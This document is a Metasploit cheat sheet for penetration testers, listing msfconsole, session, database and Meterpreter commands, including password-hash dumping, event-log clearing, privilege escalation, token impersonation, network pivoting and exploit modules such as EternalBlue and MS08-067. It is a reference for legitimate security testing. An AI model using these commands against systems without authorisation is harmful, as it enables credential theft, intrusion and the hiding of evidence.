Metasploit#
Metasploit is the world’s most-used penetration testing framework.
The operator drives modules from msfconsole, manages sessions via
Meterpreter, and pivots through compromised hosts.
General info#
$ msfconsole # launch
$ version # current version
$ msfupdate # weekly update
$ makerc <FILE.rc> # save recent commands
$ msfconsole -r <FILE.rc> # load a resource file
Exploit#
msf > use <MODULE>
msf > set payload <PAYLOAD>
msf > show options
msf > set <OPTION> <SETTING>
msf > exploit
msf > run
Session handling#
msf > sessions -l # list sessions
msf > sessions -i <ID> # interact / attach
msf > background # or Ctrl+Z to detach
Database#
$ service postgresql start
msf > msfdb init
msf > db_status # connected?
msf > hosts # show hosts
msf > services # show ports
msf > vulns # show vulns
Meterpreter session#
meterpreter > sysinfo
meterpreter > ps
meterpreter > kill <PID>
meterpreter > getuid
meterpreter > upload <file>
meterpreter > download <file>
meterpreter > pwd / lpwd
meterpreter > cd / lcd
meterpreter > cat
meterpreter > edit <FILE>
meterpreter > shell
meterpreter > migrate <PID>
meterpreter > hashdump # Windows only
meterpreter > idletime
meterpreter > screenshot
meterpreter > clearev # clear logs
Privilege escalation#
meterpreter > use priv
meterpreter > getsystem
meterpreter > getprivs
Token stealing#
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\\USER
meterpreter > drop_token
Network pivoting#
meterpreter > portfwd [ADD|DELETE] -L <LHOST> -l 3388 -r <RHOST> -p 3389
msf > route add <SUBNET> <MASK>
msf > route add 192.168.0.0/24
msf > route add 192.168.0.0/24 -d # delete a route
Search#
msf > search <TERM>
msf > show exploits
msf > show payloads
msf > show auxiliary
msf > show all
Popular modules#
msf > use auxiliary/scanner/smb/smb_enumshares # SMB share enumeration
msf > use auxiliary/scanner/smb/smb_ms17_010 # MS17-010 detection
msf > use exploit/windows/smb/ms17_010_eternalblue # EternalBlue
msf > use exploit/windows/smb/ms17_010_psexec # EternalRomance / Synergy / Champion
msf > use exploit/windows/smb/ms08_067_netapi # MS08-067
msf > use exploit/windows/smb/psexec # authenticated user code execution
msf > use exploit/multi/ssh/sshexec # SSH user code exec
msf > use post/windows/gather/arp_scanner # Windows ARP scanner
msf > use post/windows/gather/enum_applications # installed apps
meterpreter > run getgui -e # enable RDP